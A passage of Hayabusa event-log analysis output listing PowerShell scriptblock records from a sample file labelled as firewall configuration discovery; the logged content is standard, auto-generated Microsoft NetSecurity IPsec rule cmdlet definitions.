($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 